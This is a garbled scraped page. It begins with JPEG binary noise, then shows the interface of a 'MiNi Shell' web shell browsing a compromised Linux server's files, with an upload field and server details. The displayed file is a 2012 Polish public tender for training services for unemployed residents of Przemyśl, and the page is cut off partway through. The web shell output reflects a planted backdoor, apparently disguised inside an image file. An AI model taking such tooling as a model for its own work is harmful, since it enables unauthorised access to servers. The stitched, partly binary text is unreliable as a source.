JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120705/237624-N-2012.html

<p class="kh_header"><b>Przemyśl: Świadczenie usług szkoleniowych w zakresie szkoleń zawodowych</b><br>
<b>Numer ogłoszenia: 237624 - 2012; data zamieszczenia: 05.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Przemyślu , ul. Borelowskiego 1, 37-700 Przemyśl, woj. podkarpackie, tel. 016 679 11 94, faks 016 670 52 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.gminaprzemysl.home.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług szkoleniowych w zakresie szkoleń zawodowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest organizacja i przeprowadzenie  kursów zawodowych, 
    warsztatów,  seminarium wyjazdowego,  współfinansowanych ze środków 
    Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki.
2. Zamawiający zastrzega sobie prawo do skierowania na zajęcia będące przedmiotem 
    zamówienia nowego uczestnika w przypadku, gdy jeden z dotychczasowych przerwie 
    szkolenie. 
3. W przypadku  przerwania zajęć przez uczestnika szkolenia  gdy nie zostanie uzupełniona 
    grupa Zamawiający sfinansuje koszty przeprowadzenia zajęć dla tej osoby, która 
    przerwała szkolenie za okres uczestnictwa w szkoleniu na podstawie wyliczeń 
    przekazanych przez wykonawcę.
4. Wykonawca zobowiązany jest do przeprowadzenia wśród osób biorących udział 
    w zajęciach oceny merytorycznej i technicznej przebiegu zajęć. Niezależnie od tego
    najpóźniej w dniu podpisania umowy wykonawca winien przedstawić zamawiającemu 
    w programie szkolenia opis, w jaki sposób prowadzi własny nadzór wewnętrzny służący 
    podnoszeniu, jakości prowadzonych zajęć oraz kto personalnie odpowiada za realizację.
5. Wykonawca zobowiązany jest ubezpieczyć uczestników zajęć wszystkich części 
    przedmiotu zamówienia od następstw nieszczęśliwych wypadków powstałych  w związku 
    z przeprowadzonymi zajęciami, oraz w drodze do/z miejsca zajęć, zgodnie  z listą do 
    ubezpieczenia przekazaną przez Zamawiającego. Wykonawca zgłosi do ubezpieczenia 
    tylko osoby wskazane przez Zamawiającego art. 41 ust. 7 i 8 ustawy z dnia 20.04.2004 r.   
    o promocji zatrudnienia  i instytucjach rynku pracy (Dz.U.Nr 99, poz. 1001 z późn. zm.).
6. Wykonawca zobowiązany jest do zorganizowania badań lekarskich - jeśli są wymagane - 
    dla uczestników szkolenia. Koszty badań pokrywa wykonawca.

Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne części zamówienia wymienione w Specyfikacji. Wykonawca może złożyć ofertę na jedną część, na dwie części lub całość przedmiotu zamówienia. W związku z tym wykonawca zobowiązany będzie wycenić każdą cześć zamówienia oddzielnie.

	Część I - Kursy zawodowe,  warsztat

A  Kurs koparko-ładowarki + walec  - 5 osób w terminie nie wcześniej niż 24.09.2012 r. nie później niż 15.11.2012 r. w  dni  robocze 8 godzin lekcyjnych dziennie.
 Program szkolenia ma zawierać:
                - 60 godzin zajęć praktycznych - koparko- ładowarki
	   - 34 godzin zajęć praktycznych - walec
                - 140 godzin  teoria
	   - 10 godzin BHP

Program kursu koparko - ładowarki +  walec  obejmuje również koszty badan lekarskich,
koszty zaświadczeń po ukończeniu kursu oraz koszty egzaminu po zakończeniu kursu  wszystkie 
dokumenty muszą być oznakowane  zgodnie z wytycznymi dotyczącymi oznakowania projektu 
w ramach Programu Operacyjnego Kapitał Ludzki. Osoby szkolone mają mieć zapewnione materiały
 niezbędne do praktycznej nauki zawodu. Wykonawca dysponuje sprzętem koparko-ładowarką 
i walcem oraz placem manewrowym na którym będą odbywać się zajęcia praktyczne.

	B  Kurs  fryzjer - kosmetyczka - dla 5 osób w terminie nie wcześniej niż 24.09.2012 r.   nie później niż 30.10.2012 r. w dni robocze do 8 godzin  lekcyjnych dziennie.
	Program szkolenia ma zawierać:
     - 40 godzin kosmetyczka;
     - 120 godzin fryzjer w tym 100 godzin praktyka;
     - 10 godzin BHP, etyka
     - 20 godzin obsługa klienta;
Program kursu fryzjer - kosmetyczka obejmuje również koszty badań lekarskich, zaświadczeń 
o ukończeniu kursu oraz koszty egzaminu po ukończeniu kursu wszelkie dokumenty muszą być
oznakowane zgodnie z Wytycznymi dotyczącymi oznaczenia projektów  w ramach Programu
Operacyjnego Kapitał Ludzki. Osoby szkolone mają mieć zapewnione materiały niezbędne do
 praktycznej nauki zawodu.

C  Usługi w postaci szkoleń grupowych dla 10 osób -  warsztat
      Warsztat przeprowadzony przez doradcę zawodowego dla 10 osób  w ilości 5
            godzin lekcyjnych w terminie nie wcześniej niż 20.09.2012  r. nie później niż do
            21.09.2012 r. przez jeden dzień roboczy 5 godzin lekcyjnych.
Program warsztatu obejmuje również koszty zaświadczenia ukończenia warsztatu wszelka
dokumentacja prowadzona w związku z warsztatem musi zawierać oznakowanie zgodnie  
z Wytycznymi dotyczącymi oznaczania projektów w ramach  Programu Operacyjnego Kapitał Ludzki.

Ponadto Wykonawca na czas trwania poszczególnych zajęć musi zapewnić:
1. pomieszczenia do odbywania szkolenia przystosowane do liczby słuchaczy przewidzianych do szkolenia, posiadać zaplecze socjalne i sanitarne, posiadać sale wykładowe z oświetleniem naturalnym i sztucznym z odpowiednią ilością stołów 
i krzeseł, każdy z uczestników szkolenia w trakcie zajęć teoretycznych ma mieć zapewnione miejsce siedzące, w przypadku zajęć praktycznych w sali musi znajdować się odpowiedni sprzęt  i warunki do pracy;
2.  materiały szkoleniowe przygotowane dla każdego kursanta do 	każdego zakresu tematycznego  oznakowane zgodnie z wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz  długopis i kartki do notatek;
3. oznakowanie pomieszczeń, w których odbywać się będą zajęcia praktyczne i tematyczne zgodnie z wytycznymi dotyczącymi oznaczania  projektów w ramach Programu Operacyjnego Kapitał Ludzki;
4. catering w postaci napojów  min. kawa, herbata i woda mineralna butelkowana niegazowana 
i gazowana oraz obiad i suchy prowiant  np. ciasteczka, herbatniki.

	Część II  - Warsztat  

	A  warsztat profilaktyczny dla 30 osób  w ilości 40 godzin  lekcyjnych na osobę     
             w terminie nie wcześniej niż 05.09.2012 r. i nie później niż 14.09.2012 r.  
             Dwie grupy po 15 osób.
		Program warsztatu ma zawierać:
		- trening interpersonalny;
		- problemy w rodzinie osób bezrobotnych  uzależnienia, jako  źródło przemocy, 
                           konfliktów, problemów z partnerem, problemów z dziećmi);
		- praca nad własnymi emocjami i uczuciami;

Program obejmuje również koszty zaświadczeń o ukończeniu warsztatu. Poświadczenie ukończenia warsztatu i wszelka dokumentacja prowadzona w związku z warsztatem musi zawierać oznakowanie zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki
		
Ponadto Wykonawca na czas trwania poszczególnych zajęć musi zapewnić:
1. pomieszczenia do odbywania szkolenia,
2. materiały szkoleniowe przygotowane dla każdego kursanta do każdego zakresu tematycznego 
 oznakowane zgodnie z wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki) oraz  długopis i kartki do notatek;
3. oznakowanie pomieszczeń, w których odbywać się będą zajęcia praktyczne i tematyczne zgodnie 
z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki;
4. catering w postaci napojów  min. kawa, herbata i woda mineralna butelkowana gazowana i niegazowana oraz obiad  i suchy prowiant  np. ciasteczka, herbatniki.
Zamawiający wymaga, aby szkolenie było zorganizowane w odpowiednich pomieszczeniach  
z zapewnionym zapleczem do przeprowadzenia szkolenia dla osób dorosłych zgodnie  z wymogami
prawa polskiego, tj. posiadających odpowiednie warunki sanitarne bezpieczeństwa i higieny pracy,
akustyczne i jakościowe. Wymaga się, aby zajęcia odbywały się codziennie od poniedziałku do piątku.
Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę i niedzielę oraz w dniu ustawowo
wolne od pracy. Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin
lekcyjnych. Wykonawca winien zapewnić uczestnikom niezbędne narzędzia, urządzenia i sprzęt do
przeprowadzenia szkolenia.

	Część III  - Seminarium wyjazdowe dla 40 osób 3 dniowe, w trakcie seminarium : zapoznanie się z funkcjonowaniem Stowarzyszenia Klon/Jawor w Warszawie (obszar działalności  w przypadku prowadzenia działalności gospodarczej zapoznanie uczestników ze specyfiką wytwarzania lub rodzajem usług świadczonych przez Stowarzyszenie itp.) trening zadaniowy Ładowanie akumulatora - 10 godzin lekcyjnych od 20.08.2012 r. - 31.08.2012 r.  termin do ustalenia przez oferenta
Cel:
- intensywna aktywizacja osobista i społeczna uczestników
- wzbudzenie zaangażowania w podejmowaniu atrakcyjnych wyznań
- twórcza integracja
- rozwijanie umiejętności współpracy zespołowej
- przeciwdziałanie wyuczonej bezradności i bezdecyzyjności
- odkrywanie i rozwijanie kompetencji osobistych i społecznych
- umacnianie poczucia samo skuteczności i efektywności w działaniu

Program wyjazdu:

I dzień - 	
wyjazd godz. 700 
		godz. 1200 -  1300  	obiad na trasie przejazdu
		godz. 1300 - 1600   	dojazd do miejsca zakwaterowania
		godz. 1600 - 1700    	zakwaterowanie w hotelu w promieniu do 30 km 
					od Warszawy
		godz. 1700  - 1800   	kolacja stół szwedzki
		godz. 1800  -  2000 	spotkanie  przedstawicielami Stowarzyszenia 
                                                                       Klon/Jawor w Warszawie obszar działalności
                                                                       w przypadku prowadzenia działalności 
                                                                       gospodarczej, zapoznanie uczestników ze specyfiką
                                                                       wytwarzania lub rodzajem świadczonych usług

            II dzień
		godz. 800		śniadanie stół szwedzki
		godz. 900 - 1300 	              warsztaty Ładowanie akumulatora cz. I 
                                                                        w dwóch grupach po 20 osób
		godz. 1400 - 1500 	obiad
		godz. 1600 - 1900 	              warsztaty Ładowanie akumulatora cz. II
					 w dwóch grupach po 20 osób
		godz. 1930 		kolacja stół szwedzki


III dzień
		godz. 800 		śniadanie stół szwedzki
		godz. 900 - 1300 	              zwiedzanie Warszawy: zajęcia integracyjno kulturalne 
		godz. 1300 - 1400 	obiad
		godz. 1430 - 2130	              powrót + kolacja w podróży	

1. Seminarium wyjazdowe skierowane jest do osób bezrobotnych i lub nieaktywnych zawodowo i lub niepełnosprawnych, będących w wieku aktywności zawodowej, korzystających ze świadczeń pomocy społecznej, zamieszkałych na terenie Gminy Przemyśl.
2. Zamawiający wymaga, aby program zajęć zawierał, co najmniej ww. zagadnienia.
3. Osoby biorące udział w seminarium wyjazdowym połączonym z treningiem zadaniowym Ładowanie akumulatora mają mieć zapewnione materiały niezbędne do przeprowadzenia zajęć. 	

4. Wykonawca zobowiązany jest zapewnić osobom uczestniczącym w seminarium wyjazdowym:
	- transport do z miejsca pobytu, autokarem  ubezpieczonym oraz sprawnym technicznie,
- zakwaterowanie uczestników w hotelu na 2 doby hotelowe, zakwaterowanie  uczestników 
  winno odbyć się w pierwszym dniu przyjazdu,
- zakwaterowanie w odpowiednich warunkach  pokoje max. 3 osobowe z pełnym węzłem
  sanitarnym,
- pełne wyżywienie w czasie pobytu  śniadanie, obiad dwudaniowy z deserem, kolacja oraz 
  serwis kawowy tj.  kawa, herbata, ciastka, woda, soki w czasie spotkań i zajęć  spotkanie 
  z przedstawicielami Stowarzyszenia, trening zadaniowy 
- śniadanie i kolacja  stół szwedzki  wędliny, pieczywo, masło, ser, dżem, jajecznica, parówki, 
   ciasto, kawa, herbata, napoje), 
-  obiad dwudaniowy z deserem na  osobę w każdym dniu, 
- serwis kawowy  podczas spotkania z przedstawicielami Stowarzyszenia i treningu
   zadaniowego.
- w ramach seminarium wyjazdowego wykonawca zapewni atrakcyjne formy spędzania czasu 
  wolnego  dot. trzeciego dnia - zajęcia integracyjno kulturalne np. zwiedzanie Warszawy,
  sejm, senat .
5. Czas szkolenia - trening zadaniowy Ładowanie akumulatora 10 godzin lekcyjnych
     zajęcia teoretyczne i praktyczne ogółem. Szkolenie może odbywać się w godz. 900 - 1900 
      z przerwą na obiad.
6. Seminarium wyjazdowe połączone z treningiem zadaniowym Ładowanie akumulatora, zwiedzaniem Stowarzyszenia Klon/Jawor zakończy się wydaniem dokumentów świadczących o uczestnictwie w zorganizowanym w ramach wyjazdu zajęciach ( zaświadczeń, świadectw, certyfikatów itp.). Dokumenty te maja być wydane zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. Nr 31, poz. 216) i mieć logo Programu Operacyjnego Kapitał Ludzki w zestawieniu       z logo Unii Europejskiej oraz nazwę projektu, z którego finansowane jest szkolenie. 
7. Do realizacji zajęć wykonawca zapewni ich uczestnikom odpowiednie  wyposażenie techniczne adekwatne do rodzaju treningu odpowiadające indywidualnym potrzebom szkoleniowym uczestnika. W przypadku zajęć praktycznych musi być zapewniony odpowiedni sprzęt i warunki do pracy w grupach zgodnie ze specyfiką szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu odstępuje się od wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, na potwierdzenie spełniania warunku Wykonawca  przedłoży oświadczenie o spełnianiu warunków udziału  w postępowaniu o zamówienie publiczne z  art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli wykonawca przedłoży wykaz wykonanych usług w zakresie niezbędnym do wykazania wypełniania wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców z załączeniem dokumentu potwierdzającego, że te  usługi zostały wykonane lub są wykonywane należycie ( np. referencje, rekomendacje, listy polecające itp.). 
	     - co najmniej 1 usługa szkoleniowa dla minimum 2 osób ,o tematyce 
                    podobnej  do części I przedmiotu zamówienia, 
                -   co najmniej 1 usługa szkoleniowa dla minimum 5 osób o tematyce
                    podobnej  do części II przedmiotu zamówienia,
	   -    co najmniej 1 usługa  dla minimum 20 osób o tematyce podobnej do
                    części III przedmiotu zamówienia -</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca będzie dysponował odpowiednimi warunkami lokalowymi</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca będzie dysponował  osobami zdolnymi do wykonania zamówienia tj. osobami posiadającymi stosowne kwalifikacje zawodowe, doświadczenie, wykształcenie oraz uprawnienia niezbędne do przeprowadzenia szkoleń w zakresie : 
                 fryzjer - kosmetyczka, koparko-ładowarka i walec,                   warsztaty profilaktyczne, organizacja seminarium wyjazdowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, na potwierdzenie spełniania warunku Wykonawca  przedłoży oświadczenie o spełnianiu warunków udziału  w postępowaniu o zamówienie publiczne z  art. 22 ust. 1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy wraz z załącznikami ( zaleca się skorzystanie z wzorów do SIWZ), zał. nr 6 - warunki lokalowe,  zał. nr 7 - zakres powierzony podwykonawcy,  parafowany projekt umowy,  pisemne zobowiązanie innych podmiotów, zgodnie  art. 26 ust. 2b ustawy pzp do oddania wykonawcy do dyspoycji niezbędnych asobów - zał. nr 10 - jeśli dotyczy, pełnomocnictwo do reprezentowania wykonawcy- jesli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
